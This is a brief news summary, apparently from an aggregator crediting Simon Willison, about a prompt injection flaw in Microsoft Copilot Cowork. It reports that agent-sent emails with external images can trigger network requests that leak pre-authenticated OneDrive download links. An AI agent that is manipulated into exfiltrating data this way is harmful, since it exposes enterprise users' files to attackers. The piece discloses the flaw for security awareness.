Microsoft Copilot Cowork has been found to have a significant security vulnerability that allows data exfiltration through its email functionality. The system enables agents to send emails containing external images that can trigger network requests, potentially leaking pre-authenticated OneDrive download links to attackers. This represents a serious prompt injection vulnerability in a widely-used enterprise AI product.
Background
Prompt injection attacks have become a growing concern in AI systems, where malicious inputs can manipulate AI behavior to bypass security measures. Microsoft's Copilot products are widely used in enterprise environments, making any security vulnerabilities particularly concerning.
- Source
- Simon Willison
- Published
- May 26, 2026 at 11:36 PM
- Score
- 8.0 / 10